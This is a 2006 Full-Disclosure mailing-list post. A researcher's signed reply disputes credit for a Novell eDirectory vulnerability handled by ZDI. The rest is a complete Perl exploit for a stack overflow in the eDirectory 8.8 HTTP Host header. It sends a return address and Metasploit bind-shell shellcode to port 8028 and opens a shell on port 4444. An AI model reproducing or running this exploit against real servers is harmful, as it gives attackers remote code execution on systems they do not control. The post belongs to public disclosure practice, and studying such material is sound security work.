-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello Matt Richard, the vulnerability details have been submitted by me on June 1, 2006 CST/CDT (June 2, 2006 GMT+1). So I've found the vulnerability before Michael Ligh and Ryan Smith did it. But it seems that one of the employees of ZDI did a mistake during the processing of my submission. Anyway, it doesn't matter if the IDS signature got released on, before or after the patch day, because a professional IPS system like TippingPoint IPS should detect or filter shellcodes and return addresses within the host header without any special IDS signature. For example, you can filter all illegal characters from the host header and convert everything to lowercase characters. Or better: convert the domain name in the host header to a random mixture of lowercase and uppercase characters and redirect this to the destination server, this should f*** up every kind of ASCII shellcode and ASCII return address. ;-) Maybe should you better take some minutes time and think about the fact that we humans aren't perfect and make mistakes, instead of wasting your time with trying to destroy the image of a company. The employees of such companies have to do a lot of work with all the submissions that they receive and I also know other security companies that sometimes broke down because of this and did multiple mistakes during payment and processing. Sincerely yours, Manuel Santamarina Suarez Matt Richard wrote: > On 10/27/06, zdi-disclosures@xxxxxxxx <zdi-disclosures@xxxxxxxx> wrote: >> -- TippingPoint(TM) IPS Customer Protection: >> TippingPoint IPS customers have been protected against this >> vulnerability since October 26, 2006 by Digital Vaccine protection >> filter ID 4519. For further product information on the TippingPoint IPS: > <snip> >> The specific flaw exists within the httpstk.dll library within the >> dhost.exe web interface of the eDirectory Host Environment. The web >> interface does not validate the length of the HTTP Host header prior to >> using the value of that header in an HTTP redirect. This results in an >> exploitable stack-based buffer overflow. > > This 0day was reported on 10/20/06 here > http://www.mnin.org/advisories/2006_novell_httpstk.pdf. > > Seems that your initiative has fallen a bit behind. Your customers > had to wait for you to realize this had already been released and a > signature was added to Bleeding Snort on 10/23. > > It's also a bit odd that Novell released the updates on 10/20/06, the > same day as the MNIN advisory. > > Based on the time line it looks like the whole thing might have been > ripped off..... > > Cheers, > > Matt > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (MingW32) iD8DBQFFQvoRPF/cBnCBnL0RAljbAJ9dCjDyu/4Xi19XwovfDaKDe3Q/WgCglmTk XH+dkrb672FvgZKua6aHxnI= =+tQa -----END PGP SIGNATURE-----
#!perl
#
# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit
#
# Author: Manuel Santamarina Suarez
# e-Mail: FistFuXXer@xxxxxx
#
use IO::Socket;
#
# destination IP address
#
$ip = '192.168.1.25';
#
# destination TCP port
#
$port = 8028;
#
# RETurn address. 0x00, 0x0a, 0x0d, 0x3a free
#
$ret = reverse( "\x5F\x83\x3B\x7A" ); # CALL ESP
# MFC42U.5f833b7a
#
# 0x00, 0x0a, 0x0d, 0x3a free shellcode
#
# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
#
$sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
"\x4e\x56\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x48\x4e\x57".
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48".
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x57\x45\x4e\x4b\x48".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38".
"\x49\x38\x4e\x46\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d".
"\x46\x36\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x44\x4e\x50\x4b\x58".
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x36".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x35\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x46\x47\x57\x43\x47".
"\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x35\x43\x54".
"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
"\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41".
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x46\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x35\x4f\x4f\x48\x4d".
"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
"\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x36\x4c\x36\x46\x56\x48\x46\x4a\x56\x43\x36".
"\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c".
"\x49\x58\x47\x4e\x4c\x56\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x52".
"\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
"\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x55\x41\x35\x41\x55\x4c\x46".
"\x41\x50\x41\x45\x41\x55\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x46".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."\n\n";
$sock = IO::Socket::INET->new
(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print '[-] Error: Could not establish a connection to the server!' and
exit(1);
print "[+] Connected.\n";
print "[+] Trying to overwrite RETurn address...\n";
$sock->send( "GET /nds HTTP/1.1\r\n" );
$sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "\r\n\r\n" );
print "[+] Done. Now check for bind shell on $ip:4444!";
close( $sock );
Attachment:
advisory.pdf
Description: Adobe PDF document
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/